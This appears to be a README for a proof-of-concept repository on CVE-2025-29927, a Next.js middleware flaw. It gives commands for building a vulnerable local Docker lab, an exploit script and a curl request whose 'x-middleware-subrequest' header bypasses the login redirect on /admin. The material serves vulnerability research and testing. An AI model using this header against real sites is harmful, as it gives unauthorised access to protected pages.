## https://sploitus.com/exploit?id=F91ED95B-EBC4-55FD-B043-80BCA86603C7
# Next.js Middleware Vulnerability Research (CVE-2025-29927)
This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.
This proof of concept is specific for the vulnerability in **v12**
## Usage
### Environment setup
Set up the vulnerable environment using docker and the files from this repo by running:
```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```
### Exploit
This repository has the `exploit.sh` already created script to test the explotation of the vulnerability. Tu test it run:
```bash
chmod +x exploit.sh
./exploit.sh
```
Additionally you can test the explotation of the vulnerability by trying the following
1. Request the admin page without authentication. You should get a redirection to the `login` page.
```bash
curl -i http://localhost:3000/admin
```
2. Request the page without authentication but using the `x-middleware-subrequest` header. You should be able to bypass the authentication page.
```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```
## Security Advisory
- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)